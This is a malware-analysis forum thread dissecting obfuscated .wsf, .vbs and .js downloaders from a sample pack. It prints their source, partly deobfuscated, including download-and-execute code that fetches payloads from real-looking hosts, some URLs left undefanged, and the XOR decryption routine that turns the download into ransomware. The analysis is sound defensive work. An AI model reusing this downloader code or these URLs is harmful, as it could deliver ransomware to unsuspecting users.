Malware Analysis Downloaders - Scripted samples from Malware Vault - 1-8-16 13#

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
https://malwaretips.com/threads/1-8-16-13.61883/
(Thanks to @[URL='https://malwaretips.com/members/solarquest.25489/']Solarquest[/URL] for the "cookies" :) )

I've seen there are, inside the zipped archive, several scripted downloaders with some obfuscation methods (.vbs , .js, .wsf)

I will use this thread to analyse , and show what it looks like once deobfuscated (or not :p )


(1) The .wsf files

11 annual report -ACAE1246-.wsf
13 annual report -EDAB2336-.wsf
10 07e81be27f.wsf
9 PV1.wsf

I add from same sub-wave : a file I received as a target, yesterday :
annual report -DFC52512-.wsf
"Dear DardiM,

Please review the attached corrected annual report.


Yours faithfully
Isabel Sutton"

=> reported, this is the result : https://www.hybrid-analysis.com/sam...f309f2add84d337c11ca00c25b0?environmentId=100

This samples are similar downloaders than the one I analysed here, once deobfuscated :
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/

So, I won't describe again the deobfuscated parts, just talk about some funny parts :)

- No need to deobfuscate them (very bad obfuscation method used, see below) : only with a "notepad edit" we can see some parts that I already described on my precedent post (from the fresh new sample received on last wave July,28) :

- Some important clues that appear clearly in the "obfuscated file", by a simple "find" option (it made me laugh :) ) :
=> var random :rolleyes:
=> rawprng()
=> var mash = Mash();
=> function uheprng()

- not very obfuscated important part:
=> QVh1 /* c\040 */(25\066); => QVh1(256) => used for the XOR
=> arrays of chars used for the de-cipher parts (char replacement)

Do you remember that names ? I hope, else go and see the link to analysis above :p

To summarize :
- These family of scripted downloader, downloads on a path an obfuscated payload that is not seen as executable file.
- The same scripted downloader is also used to decipher, deobfuscate the content of the payload downloaded to make it become a real executable, a ransomware with .exe extension.
- Then the scripted downloader run the payload with a parameter.

The values / names seen above in red are from the new version of this family of downloader using a more complicated technique to obtain the value used to make an XOR between each content char of future .exe file and a value returned by QVh1(256) function. The result take place on the precedent old content char used for the XOR

var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
// file_content_temp[index] = file_content_temp[index]^ QVh1(256);
}

QVh1 = uheprng() => content of var random
=> call sub-function : var mash = Mash(); mash(value), etc
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
)
=> this names should had been obfuscated from the first obfuscation method, because this is really clues to detect the malware easily
function uheprng() {
return (function() {
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 1 * 0; i < o; i++) s = mash(384267);
mash = null;

var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
if (++p >= o) p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;


}());
};

function Mash() {

var n = 0xefc8249d;
var mash = function(data) {
if (data) {

data = data.toString();
for (var i = -8257 + 8257; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else
n = 0xefc8249d;
};
return mash;
}

Trojan-Downloader.JS.Agent.lxw

Clearly similar to :

Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80

But With awful first obfuscation method => very easy to detect by heuristic analysis
(because they let appear some important string from simple editor text :confused:)


Obfuscation Method used first:

<job id="a">
<script language="JScript" id="a">
if (WScript.Path.charAt(WScript.Path.length-1) != "2") WScript.Quit(0);
var aDb7 = 'var\040SNg\065 \075 "ose" +\040"";\r\nvar \122d0 = "cl" +\040"";\r\nvar XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";\r\nvar\040LUg \075 "ext" + "";\r\nvar FSi \075 "iteT" + \042";\r\nv\141r Iq2 \075\040"\167r" +\040"";\r\012var MCl\060\040= "\157p\145n" \053 "";\r\nvar COz = "t" + "";\r\nvar So2 = "rs\145" + "";\r\012var Bk = "C\150a" + ""\073\r\012var\040Pn0\040= "pe" + "";\r\nva\162\040L\154\040= "\164y" + "";\r\n\166ar Yo6\040=\040"m\042 \053 ""\073\r\012var AK\164 = "ea\042 +\040"\042;\r\nvar Fr0 = "tr" + "";\r\n\166ar NYf\065 = \042DB.S" + "";\r\nvar ISh9 = \042O" \053\040"";\r\nv\141r UFg =\040"D" + \042"\073\r\nva\162 YBj = "A" + "";\015\012\166ar \110j\061 = "ect"\040+ "";\r\nvar Ak1 = "eObj\042\040+\040"";\r\nvar\040Qh6 = "eat" + "";\r\nvar Rp9 = \042C\162" + ""\073\r\012functi\157n \124V\145(EIq0)\173re\164urn EIq0;};var N\122\157 = "in" +\040""\073\r\nv\141r Qr9\040= "jo" \053 "";\r\012var YKt = "C\157de\042 + "";\r\nvar Mj9\040= "har" + "\042\073\r\012var QRt = "\146romC" + ""\073\r\nvar Fo9 =\040"h\042 + \042"\073\r\nvar NSj = "l\145n\147t" + "";\r\nvar \132K\161 = \042h" + "";\015\nvar Vy = "pus" + "";\015\nvar \112Rx9 = "t" + "";\r\nvar \115p = "od\145A" + "\042;\r\nvar Ip = "c\150a\162C" + "";\r\nvar\040QRw =\040"h" + \042";\015\012\166a\162 Ul =\040\042\154engt" + "";\015\nvar Vj0\040= "close"
....
....
KJp\133TWg0]();\r\012};';
eval(aDb7.replace('@', 'v'));
WScript.Quit(1);
</script>
</job>

- unescape unicode

=> some char are replaced by \unicode

An example :

var XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";

=> Unicode Escaping Tools - Online Toolz

copy-paste in the part :

Converts Unicode Entities to Unicode Text
Unicode Entities

click on convert
result :

var XIu6 = "le" + "";
var Ec = "oFi" + "";
var Ui = "SaveT" + "";


You can't use the tool linked above for decoding the whole file, because some other chars will make it fails :)
But this can give you an idea of the "poor" method used

Obfuscation Method used after :

- string replacement by var concatenations, functions calls

(2) 2.8.vbs

Dim gqawtaci
Dim lelruwu7, vlopazo9, dasgilcur9, kiwilve, rocu2, gquhynk4, rmahbezc, ibefo, ijlagle, karyccoq, tefcy2
Dim wyfpi2, ofebw9, qhopkuqfa, imonqy2, aqiv4, iphewb, bubhumug8, zapjym, fifgimtud7
Dim nisyc
Dim avduwra
Dim cuwosamv, znawmuji0, hsinugzy6, gizwul1, uniku, nkemyfog3, efhawu, lexxanwy1
kiwilve = Array ("asn", "ze", "Sc", "ufluv", "uhd", "lwyzl")(2)
ibefo = "WS"
function yqegnokve ()
...
...
End function
vlopazo9 = "el"
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
function nwaqzupe ()
Dim ecowsupo
ecowsupo = "Sy"
nwaqzupe = ecowsupo
End function
function exjat ()
Dim cihojy
cihojy = Array ("LH", "npib", "ipo", "facl", "ese", "xu")(0)
exjat = cihojy
End function
function ymqunygf ()
Dim ixuje
ixuje = "ri"
ymqunygf = ixuje
End function
function vaxivwu ()
Dim yjytt
yjytt = Array ("oje", "hu", "kdeja", "uri", "ip", "efva")(4)
...
lelruwu7 = "Ob"
znawmuji0 = "ex"
efhawu = Array ("Fi", "upe", "dare", "invu", "meff", "uzujq", "uqky", "pa")(0)
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
dasgilcur9 = "b."
tefcy2 = "/c"
function kqufiwbe ()
Dim htywcix
htywcix = Array ("yvah", "oci", "bci", "hxy", "psoqpo", "cbicy", " ", "lyqx")(6)
kqufiwbe = htywcix
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ocgusix ()
Dim zfevydu
zfevydu = "of"
ocgusix = zfevydu
End function
nkemyfog3 = Array ("fxofu", "so", "cr", "ly", "gdi", "uwe", "hri")(2)
cuwosamv = "ng"
lexxanwy1 = Array ("usit", "ujpaz", "kmaz", "aqus", "em", "xax", "no")(4)
karyccoq = "in"
function ugqufqor ()
Dim ecbabruri
ecbabruri = "l"
ugqufqor = ecbabruri
End function
...
...
End function
ijlagle = Array ("vgev", "yriv", "hsexvy", "izto", "wbokm", "ywuvz", "le")(6)
function alwub ()
Dim ciherw
ciherw = Array ("ur", "hxymmo", "dwadm", "udg", "iqber", "oxa", "e ")(6)
alwub = ciherw
End function
function edunahi ()
Dim oxtivvy
oxtivvy = Array ("cwe", "gworne", "Mi", "zuf", "ucik", "ygduv", "itx", "ydp")(2)
edunahi = oxtivvy
End function
function fboxpopku ()
Dim pxapzo
pxapzo = "st"
fboxpopku = pxapzo
End function
function inut ()
Dim xysote
xysote = Array ("je", "tvyth", "uxu", "atu", "osbefh", "bo")(0)
inut = xysote
End function
wyfpi2 = Array ("oba", "t.", "debu", "xwo", "txafy", "icv")(1)
function ypirysy ()
Dim mankiga
mankiga = Array ("wi", "orqu", "op", "P", "yxf", "okovs", "otse")(3)
ypirysy = mankiga
End function
...
....
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "http://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla

Obfuscation Method used :

Only replacement / concatenation of strings from vars or functions (an example below)

The funniest part : at the end of the file, this part :

...
...
function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.
run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 =
CreateObject(gizwul1)
Set ovoraztu4 =
CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.
GetSpecialFolder( adsyqgu )
Set pwodesen5 =
CreateObject(rocu2)
Set unjijbagwe2 =
CreateObject(iphewb)
ozsupxisjo = ovoraztu4.
GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.
Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.
Send
pwodesen5.Type = hyztomy
pwodesen5.
Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla


First conclusion :
=> important parts are not very well obfuscated .... :rolleyes:
=> We can see the url used for the payload o_O

Without trying to deobfuscate it, it's easy to understand almost all :

(Better obfuscation, but analogue result seen on a precedent analysis :
https://malwaretips.com/threads/1-vbs-sample-downloader-vbswgbased-gen-deobfuscation.61734/
=> spoiler on part (4)
)

- It creates a temp file name and makes the path :
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo

(adsyqgu = 2 : The Temp folder is used to store temporary files. Its path is found in the TMP environment variable)

- opens a connection and send the request :
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.
Send
(uniku = "GET")

- creates an object and opens a stream to save the content received :
Set pwodesen5 = CreateObject(rocu2)
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
("ADODB.Stream" object => see below)

- and uses the same object to save it to a file :
pwodesen5.savetofile pelisak, adsyqgu

- at the end, it runs the payload :
ysezhuxwa unjijbagwe2, pelisak, ozylefla
(function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if)


easy to understand what this script makes...
I deobfuscated 0 parts to write above part ...

(In Green, informations I've retrieve after, to be more clear)

An example of string obtained by several methods :

Set pwodesen5 = CreateObject(rocu2)

rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu

with :

rmahbezc = Array ("ke", "
Ad", "cat", "ygysb", "awby", "adpa")(1)
// I have rarely seen as easy method => Array(......)(indice_to_use_in_clear)

bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "
b."

function zucebi ()

Dim efjipxu
efjipxu = "
St"
zucebi = efjipxu
End function

function cdanufv ()

Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "
re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function

function ibebacu ()

Dim fibytekj
fibytekj = Array ("
am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function

=> red strings => rocu2 = "adodb.stream"
=> Set pwodesen5 = CreateObject("adodb.stream")

I stop here for the very easy obfuscation methods used.
Next part will be with a sample that uses a more elaborate obfuscation method, from the same Malware Vault pack.

(3) "4 6183943701_01-08-2016.js" ( same method as "7 9329606101_01-08-2016.wsf") :

When first editing this file, the obfuscation method looks interesting
In the spoiler only few parts, to give you an idea
votgorodazaspinoyiputkoroheCCCrodmands.create = function(){
var votgorodazaspinoyiputkoroheCCC
publisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
var votgorodazaspinoyiputkoroheCCC
spyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
votgorodazaspinoyiputkoroheCCC
publisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCC
publisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(),
"Function called without arguments");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1,
"PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(
"PROPER1"), "Function called with 'PROPER1' argument");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, [
"PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith([
"PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCC
rodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCC
param1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = {
':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCC
achievment(votgorodazaspinoyiputkoroheCCCbidttt){
if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.
replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};
var votgorodazaspinoyiputkoroheCCC
chosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.
x = x + "bbfgnfgngn";
this.
y = y - "fgnfgngfgf";
};

var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);

...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());

...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...

try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("
http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

Deobfuscation :

1)

First thing to do : delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts :

rodmands.create = function(){
var publisher = new MBJSL.
Publisher();
var spyFunction1 = sinon.
spy();
publisher.
subscribe(spyFunction1, this.type1);
publisher.
publish(this.type1);
ok(spyFunction1.
calledWith(), "Function called without arguments");
publisher.publish(this.
type1, "PROPER1");
ok(spyFunction1.
calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.
type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.
calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.
subtract = function(param1, param2) {
return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
if(bidttt==1){return 2;}
else{return 17;}
return 3;};
function center(rivulet) {
request = rivulet;
for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq);}
return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());

Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new 